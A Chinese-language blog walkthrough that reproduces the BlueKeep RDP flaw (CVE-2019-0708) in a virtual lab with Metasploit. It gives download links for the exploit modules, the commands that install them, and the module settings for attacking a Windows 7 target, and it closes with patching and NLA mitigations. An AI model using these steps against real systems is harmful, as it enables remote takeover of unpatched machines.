前言
上個月爆出exp的一個高危漏洞,跟風復現一下下。。。( ̄▽ ̄)~*
簡介
Windows再次被曝出一個破壞力巨大的高危遠程漏洞CVE-2019-0708。攻擊者一旦成功利用該漏洞,便可以在目標系統上執行任意代碼,包括獲取敏感信息、執行遠程代碼、發起拒絕服務攻擊等等攻擊行為。而更加嚴重的是,這個漏洞的觸發無需用戶交互,攻擊者可以用該漏洞制作堪比2017年席卷全球的WannaCry類蠕蟲病毒,從而進行大規模傳播和破壞。
影響范圍

注:Windows 8和windows10以及之后的版本不受此漏洞影響
所需條件
目標機開啟3389端口,關閉防火牆(或者在防火牆策略中放行3389端口)
環境
kali ip 192.168.10.52
靶機win7 ip 192.168.10.55(開啟了3389端口,關閉了防火牆)
都是虛擬機,使用橋接模式
1、更新我們的msf
命令行執行
apt-get update
apt-get install metasploit-framework
我這里更新后雖然有一些報錯但還是能夠使用

2、下載 exp
網盤:鏈接:
https://pan.baidu.com/s/1HTk3ehKvZYM0rh4tC0TQLg 提取碼: 4dy9
下載后將文件移到kali並將它門放到指定位置
rdp.rb放到/usr/share/metasploit-framework/lib/msf/core/exploit 目錄
rdp_scanner.rb和cve_2019_0708_bluekeep.rb放到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 目錄
cve_2019_0708_bluekeep_rce.r放進/usr/share/metasploit-framework/modules/exploits/windows/rdp 目錄,這里需要注意如果沒有rdp這個目錄就去創建個。
命令(一定要把原先的文件覆蓋)
cp rdp.rb /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
3、更新msf的模塊
先在kali中msfconsole進入metasploit
在使用reload_all加載復制過去的腳本
稍等一下即可
4、使用模塊
search 0708 3是我們用到的模塊

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 使用模塊
這個exp 目前只有 windwos 7 /2008r2 (我這里用的是win7旗艦版64位)
set RHOSTS 設置IP
set RPORT 設置RDP端口號
使用set target ID設置受害機機器
使用exploit開始攻擊,等待建立連接
於是
set RHOSTS 192.168.10.55填寫受害機
set RPORT 3389設置端口(固定)
show targets

以為我是虛擬機win7所以這里選三
set target 3
然后就exploit或run開始攻擊(第一次win7藍屏,第二次成功)

搜集的漏洞檢測工具
網盤鏈接https://pan.baidu.com/s/1ylewLDQPwc4FuxCkm-aQlg 提取碼ailu
漏洞修復:
- 及時打對應系統的安全補丁
- 關閉3389端口或添加防火牆安全策略限制對3389端口的訪問
- 打不了補丁的可以開啟遠程桌面(網絡級別身份驗證(NLA)),可以臨時防止漏洞攻擊